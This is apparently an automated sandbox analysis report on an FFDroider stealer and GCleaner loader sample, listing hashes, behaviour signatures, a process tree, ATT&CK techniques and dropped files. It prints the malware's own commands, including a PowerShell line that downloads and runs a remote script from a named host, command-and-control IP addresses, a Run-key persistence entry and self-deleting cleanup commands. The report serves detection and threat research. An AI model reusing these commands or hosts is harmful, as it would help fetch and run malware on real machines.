ffdroider | e99574f67e511e9b940c788de58592b02542972981f69ebe2806d876e01135fb

Analysis

max time kernel
145s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
25/05/2023, 04:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b79fbf16b76bd0ff14e9d079e40e889.exe
Size

380KB
MD5

0b79fbf16b76bd0ff14e9d079e40e889
SHA1

eca7116292f3437102b06c7f2b78e32fa6ae69a5
SHA256

e99574f67e511e9b940c788de58592b02542972981f69ebe2806d876e01135fb
SHA512

6bebbd4cc5b7ecfa7f90ea1f65ba83c74f9be14080e12cca30026067627914e5a9e0809cbb79aec4081c1498757201022eedfcef26a47d4cbe9f03dbcf79f26d
SSDEEP

6144:x/QiQXCfkm+ksmpk3U9j0IT2OGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoglM7LT:pQi3fP6m6UR0IT2lL//plmW9bTXeVhD4

Score

10^/10

ffdroider gcleaner evasion loader persistence stealer vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://xptv1.com/wp-content/uploads/debug2.ps1

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Signatures

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Blocklisted process makes network request 2 IoCs

flow	pid	Process
68	1428	powershell.exe
71	1428	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	GABRIEL.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	GABRIEL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	Vinyvijaxae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	postmon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	gcleaner.exe

Executes dropped EXE 8 IoCs

pid	Process
3768	0b79fbf16b76bd0ff14e9d079e40e889.tmp
4112	GABRIEL.exe
4144	Vinyvijaxae.exe
2820	gcleaner.exe
3952	postmon.exe
4400	a02.exe
1268	2.1.1.exe
3804	wfplwfs.exe

Loads dropped DLL 1 IoCs

pid	Process
3768	0b79fbf16b76bd0ff14e9d079e40e889.tmp

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/files/0x000300000000072d-250.dat	vmprotect
behavioral2/files/0x000300000000072d-251.dat	vmprotect
behavioral2/memory/3804-259-0x0000000000400000-0x0000000000D4A000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft\\Vinyvijaxae.exe\""	GABRIEL.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3804 set thread context of 464	3804	wfplwfs.exe	134

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\OCOEUBSTLV\poweroff.exe	GABRIEL.exe
File created	C:\Program Files (x86)\Microsoft\Vinyvijaxae.exe	GABRIEL.exe
File created	C:\Program Files (x86)\Microsoft\Vinyvijaxae.exe.config	GABRIEL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\3754e62b4c0a956d.job	wfplwfs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
3740	2820	WerFault.exe	90
4864	2820	WerFault.exe	90
3572	2820	WerFault.exe	90
432	2820	WerFault.exe	90
4852	2820	WerFault.exe	90
1328	2820	WerFault.exe	90
3728	2820	WerFault.exe	90
1480	2820	WerFault.exe	90
3164	2820	WerFault.exe	90

Kills process with taskkill 1 IoCs

evasion

pid	Process
5072	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2232	PING.EXE
2144	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe
4144	Vinyvijaxae.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4112	GABRIEL.exe
Token: SeDebugPrivilege	4144	Vinyvijaxae.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	5072	taskkill.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
464	rundll32.exe
464	rundll32.exe
464	rundll32.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 4028 wrote to memory of 3768	4028	0b79fbf16b76bd0ff14e9d079e40e889.exe	80
PID 4028 wrote to memory of 3768	4028	0b79fbf16b76bd0ff14e9d079e40e889.exe	80
PID 4028 wrote to memory of 3768	4028	0b79fbf16b76bd0ff14e9d079e40e889.exe	80
PID 3768 wrote to memory of 4112	3768	0b79fbf16b76bd0ff14e9d079e40e889.tmp	82
PID 3768 wrote to memory of 4112	3768	0b79fbf16b76bd0ff14e9d079e40e889.tmp	82
PID 4112 wrote to memory of 4144	4112	GABRIEL.exe	83
PID 4112 wrote to memory of 4144	4112	GABRIEL.exe	83
PID 4144 wrote to memory of 3452	4144	Vinyvijaxae.exe	88
PID 4144 wrote to memory of 3452	4144	Vinyvijaxae.exe	88
PID 3452 wrote to memory of 2820	3452	cmd.exe	90
PID 3452 wrote to memory of 2820	3452	cmd.exe	90
PID 3452 wrote to memory of 2820	3452	cmd.exe	90
PID 4144 wrote to memory of 4372	4144	Vinyvijaxae.exe	93
PID 4144 wrote to memory of 4372	4144	Vinyvijaxae.exe	93
PID 4372 wrote to memory of 3952	4372	cmd.exe	97
PID 4372 wrote to memory of 3952	4372	cmd.exe	97
PID 4372 wrote to memory of 3952	4372	cmd.exe	97
PID 3952 wrote to memory of 2340	3952	postmon.exe	98
PID 3952 wrote to memory of 2340	3952	postmon.exe	98
PID 2340 wrote to memory of 1428	2340	cmd.exe	100
PID 2340 wrote to memory of 1428	2340	cmd.exe	100
PID 2820 wrote to memory of 3576	2820	gcleaner.exe	117
PID 2820 wrote to memory of 3576	2820	gcleaner.exe	117
PID 2820 wrote to memory of 3576	2820	gcleaner.exe	117
PID 3576 wrote to memory of 5072	3576	cmd.exe	121
PID 3576 wrote to memory of 5072	3576	cmd.exe	121
PID 3576 wrote to memory of 5072	3576	cmd.exe	121
PID 4144 wrote to memory of 4848	4144	Vinyvijaxae.exe	122
PID 4144 wrote to memory of 4848	4144	Vinyvijaxae.exe	122
PID 4848 wrote to memory of 4400	4848	cmd.exe	124
PID 4848 wrote to memory of 4400	4848	cmd.exe	124
PID 4848 wrote to memory of 4400	4848	cmd.exe	124
PID 4400 wrote to memory of 1268	4400	a02.exe	125
PID 4400 wrote to memory of 1268	4400	a02.exe	125
PID 4400 wrote to memory of 1268	4400	a02.exe	125
PID 3952 wrote to memory of 2508	3952	postmon.exe	127
PID 3952 wrote to memory of 2508	3952	postmon.exe	127
PID 3952 wrote to memory of 2508	3952	postmon.exe	127
PID 2508 wrote to memory of 2232	2508	cmd.exe	129
PID 2508 wrote to memory of 2232	2508	cmd.exe	129
PID 2508 wrote to memory of 2232	2508	cmd.exe	129
PID 4400 wrote to memory of 3804	4400	a02.exe	130
PID 4400 wrote to memory of 3804	4400	a02.exe	130
PID 4400 wrote to memory of 3804	4400	a02.exe	130
PID 4400 wrote to memory of 4968	4400	a02.exe	131
PID 4400 wrote to memory of 4968	4400	a02.exe	131
PID 4400 wrote to memory of 4968	4400	a02.exe	131
PID 4968 wrote to memory of 2144	4968	cmd.exe	133
PID 4968 wrote to memory of 2144	4968	cmd.exe	133
PID 4968 wrote to memory of 2144	4968	cmd.exe	133
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134
PID 3804 wrote to memory of 464	3804	wfplwfs.exe	134

C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe
"C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Users\Admin\AppData\Local\Temp\is-9DUHG.tmp\0b79fbf16b76bd0ff14e9d079e40e889.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-9DUHG.tmp\0b79fbf16b76bd0ff14e9d079e40e889.tmp" /SL5="$8005C,140559,56832,C:\Users\Admin\AppData\Local\Temp\0b79fbf16b76bd0ff14e9d079e40e889.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Users\Admin\AppData\Local\Temp\is-I1VBN.tmp\GABRIEL.exe
    "C:\Users\Admin\AppData\Local\Temp\is-I1VBN.tmp\GABRIEL.exe" /S /UID=flabs2
    3⤵
    - Drops file in Drivers directory
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe
      "C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4144
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe /mixfive & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3452
      - C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe /mixfive
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 192
        7⤵
        Program crash
        
        PID:3740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 764
        7⤵
        Program crash
        
        PID:4864
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 772
        7⤵
        Program crash
        
        PID:3572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 772
        7⤵
        Program crash
        
        PID:432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 820
        7⤵
        Program crash
        
        PID:4852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 984
        7⤵
        Program crash
        
        PID:1328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 1016
        7⤵
        Program crash
        
        PID:3728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 1324
        7⤵
        Program crash
        
        PID:1480
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3576
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 1392
        7⤵
        Program crash
        
        PID:3164
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4372
      - C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe
        
        C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://xptv1.com/wp-content/uploads/debug2.ps1')"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://xptv1.com/wp-content/uploads/debug2.ps1')
        8⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1428
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe" >> NUL
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2508
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        8⤵
        Runs ping.exe
        
        PID:2232
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe
        
        C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
        
        C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
        7⤵
        Executes dropped EXE
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
        
        C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:3804
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:464
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4968
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        Runs ping.exe
        
        PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 2820
1⤵
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2820 -ip 2820
1⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2820 -ip 2820
1⤵
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2820 -ip 2820
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2820 -ip 2820
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2820 -ip 2820
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2820 -ip 2820
1⤵
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2820 -ip 2820
1⤵
PID:3584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2820 -ip 2820
1⤵
PID:4600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.1.1.exe

Filesize
478KB

MD5
eb75a43690afdea95c83ba331de640b7

SHA1
b65715468e185c3b54b60e075459a5f8b6e9c0f7

SHA256
21df0ff4710ab3ea44a1950745f9c71f3098bce46c5b0a7e86ba2777810ae855

SHA512
781a0b3fd4afecad6e4acf6cea53377b6c2d883fa9f14290f9530f7824fb4c1a89831edd2b67740392390bb984d530e1a34bcd45d350cec8341a8ffc55c01a9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.1.1.exe

Filesize
478KB

MD5
eb75a43690afdea95c83ba331de640b7

SHA1
b65715468e185c3b54b60e075459a5f8b6e9c0f7

SHA256
21df0ff4710ab3ea44a1950745f9c71f3098bce46c5b0a7e86ba2777810ae855

SHA512
781a0b3fd4afecad6e4acf6cea53377b6c2d883fa9f14290f9530f7824fb4c1a89831edd2b67740392390bb984d530e1a34bcd45d350cec8341a8ffc55c01a9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\70-8a52c-d9a-31984-a1fe6ce9b3c9a\Vinyvijaxae.exe

Filesize
54KB

MD5
5ecada8d78cd1cda19042f61bd9ffd08

SHA1
c447c6d03f034bd3a86407c9ec3541bdc83d2093

SHA256
1faca4ff39738dd2cf3a0ad069278af93b5b7dd1c95bbc7c3cf032e4255ad0e2

SHA512
d9e53351d53653d7ed4720068d1c3e4d1ed5578c18643248567bddc191679cdc4fb5e4b4613140407d2e69805006f50874ab4dac26f35415b3e3c51fb8ccc96b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvgmm1kt.ikz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Kenessey.txt

Filesize
9B

MD5
97384261b8bbf966df16e5ad509922db

SHA1
2fc42d37fee2c81d767e09fb298b70c748940f86

SHA256
9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

SHA512
b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe

Filesize
415KB

MD5
6f66d806f252bb81ed8954dceed8cce9

SHA1
10503d75e10978efe11359a6773f05280ab483d7

SHA256
380e904d62a0142c8afd063d6a79f6c067e9931859a38d65df81ed428e22dd63

SHA512
a2b286482217b00c64fec8b07837633fdacfb1d6ddc605812f34a7dee9b4aec1e7624d5607eab3995b22415cf21a32481ba5ff86be03f68ee6f7924ee54c00d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe

Filesize
415KB

MD5
6f66d806f252bb81ed8954dceed8cce9

SHA1
10503d75e10978efe11359a6773f05280ab483d7

SHA256
380e904d62a0142c8afd063d6a79f6c067e9931859a38d65df81ed428e22dd63

SHA512
a2b286482217b00c64fec8b07837633fdacfb1d6ddc605812f34a7dee9b4aec1e7624d5607eab3995b22415cf21a32481ba5ff86be03f68ee6f7924ee54c00d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe

Filesize
415KB

MD5
6f66d806f252bb81ed8954dceed8cce9

SHA1
10503d75e10978efe11359a6773f05280ab483d7

SHA256
380e904d62a0142c8afd063d6a79f6c067e9931859a38d65df81ed428e22dd63

SHA512
a2b286482217b00c64fec8b07837633fdacfb1d6ddc605812f34a7dee9b4aec1e7624d5607eab3995b22415cf21a32481ba5ff86be03f68ee6f7924ee54c00d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6-b8183-748-231a8-56b5a4a048e8a\Vinyvijaxae.exe.config

Filesize
1KB

MD5
98d2687aec923f98c37f7cda8de0eb19

SHA1
f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

SHA256
8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

SHA512
95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

Download Submit
C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe

Filesize
328KB

MD5
0837b113c5c34a669e0152706b8c2e18

SHA1
78df15d15e884ce84868699ee80b32f5bc5625ed

SHA256
6d2016e9d9252c1025080f601edbd0709b99066c87550206914dda9cea247c5d

SHA512
d96e44b81c19c4412dd067652d0b2571f9a516b528d12ca87c356fdfdf0f711fb4b71a7123c7f1d638c373f17d2c0962dfeb5a2a1912fcec339732917b4bb8b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cyumkqvt.0yl\gcleaner.exe

Filesize
328KB

MD5
0837b113c5c34a669e0152706b8c2e18

SHA1
78df15d15e884ce84868699ee80b32f5bc5625ed

SHA256
6d2016e9d9252c1025080f601edbd0709b99066c87550206914dda9cea247c5d

SHA512
d96e44b81c19c4412dd067652d0b2571f9a516b528d12ca87c356fdfdf0f711fb4b71a7123c7f1d638c373f17d2c0962dfeb5a2a1912fcec339732917b4bb8b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe

Filesize
6.0MB

MD5
820241820224a5c7eed0ca74b7420361

SHA1
4ad3588ecd226fde7fe8543c281290997a4ad9ac

SHA256
7740df954417683f1614403a7fa6607e7b9002ae045e25a07c8fd4e67f0b3c3f

SHA512
17cc22e2d7c59bc86b5145e2990b76faf2602c3a4c19d6c7b23a84067240455e1293c857c1966217c26d8ae4baded83b612ed5325c7e5dea3bfa42335aa0d59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dwyb2hin.zb0\a02.exe

Filesize
6.0MB

MD5
820241820224a5c7eed0ca74b7420361

SHA1
4ad3588ecd226fde7fe8543c281290997a4ad9ac

SHA256
7740df954417683f1614403a7fa6607e7b9002ae045e25a07c8fd4e67f0b3c3f

SHA512
17cc22e2d7c59bc86b5145e2990b76faf2602c3a4c19d6c7b23a84067240455e1293c857c1966217c26d8ae4baded83b612ed5325c7e5dea3bfa42335aa0d59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-9DUHG.tmp\0b79fbf16b76bd0ff14e9d079e40e889.tmp

Filesize
694KB

MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I1VBN.tmp\GABRIEL.exe

Filesize
638KB

MD5
4ab4f24b913575f5dbaf2f17a6b5a2b1

SHA1
7503c3e39f831d87ecf425475c85e0e6ab6c6807

SHA256
3e62898c905cdbccd43742115935bfe20a8d27111b21ad53027c9ed576d45dbe

SHA512
99e49a43949258f8095fa11062e65131b73c7ec9de565766783156f88e718b8b8f14f63bf70fa275fefadc88c7558ff46d754d50842449aaae2f7c7f296701d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I1VBN.tmp\GABRIEL.exe

Filesize
638KB

MD5
4ab4f24b913575f5dbaf2f17a6b5a2b1

SHA1
7503c3e39f831d87ecf425475c85e0e6ab6c6807

SHA256
3e62898c905cdbccd43742115935bfe20a8d27111b21ad53027c9ed576d45dbe

SHA512
99e49a43949258f8095fa11062e65131b73c7ec9de565766783156f88e718b8b8f14f63bf70fa275fefadc88c7558ff46d754d50842449aaae2f7c7f296701d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I1VBN.tmp\idp.dll

Filesize
216KB

MD5
8f995688085bced38ba7795f60a5e1d3

SHA1
5b1ad67a149c05c50d6e388527af5c8a0af4343a

SHA256
203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

SHA512
043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

Download Submit
C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe

Filesize
240KB

MD5
ccdf8ac2c512c38295d0b3e645e3bda9

SHA1
a4f32a93dd7b10c17ada4315d39212152f113ba9

SHA256
131c6e1d336ad0419385e3954c3bd781204a372a14c9f111478d80d827e4f73e

SHA512
5e81062d5d799b7b8bca9dd622efb599e1de13ca2ba46d8d3d1086d5bba5d0c4823ad581bec5504d311830d5f4159008a0a8d24f94435436298c7fd705ff64ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\vobpo1dy.0jv\postmon.exe

Filesize
240KB

MD5
ccdf8ac2c512c38295d0b3e645e3bda9

SHA1
a4f32a93dd7b10c17ada4315d39212152f113ba9

SHA256
131c6e1d336ad0419385e3954c3bd781204a372a14c9f111478d80d827e4f73e

SHA512
5e81062d5d799b7b8bca9dd622efb599e1de13ca2ba46d8d3d1086d5bba5d0c4823ad581bec5504d311830d5f4159008a0a8d24f94435436298c7fd705ff64ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe

Filesize
5.4MB

MD5
ad08fb264dd83251bebda5b2c71871f0

SHA1
